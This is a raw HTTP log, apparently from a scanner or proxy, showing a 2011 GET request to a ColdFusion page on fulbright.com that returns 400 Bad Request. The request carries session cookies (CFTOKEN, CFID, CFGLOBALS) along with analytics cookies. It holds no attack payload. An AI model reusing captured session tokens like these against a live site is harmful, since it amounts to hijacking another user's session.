GET /index.cfm?fuseaction=local.detail&site_id=299&link_name=Map and Directions HTTP/1.1 Host: www.fulbright.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;
Response
HTTP/1.1 400 Bad Request Content-Type: text/html Date: Wed, 19 Jan 2011 15:48:37 GMT Connection: close Content-Length: 20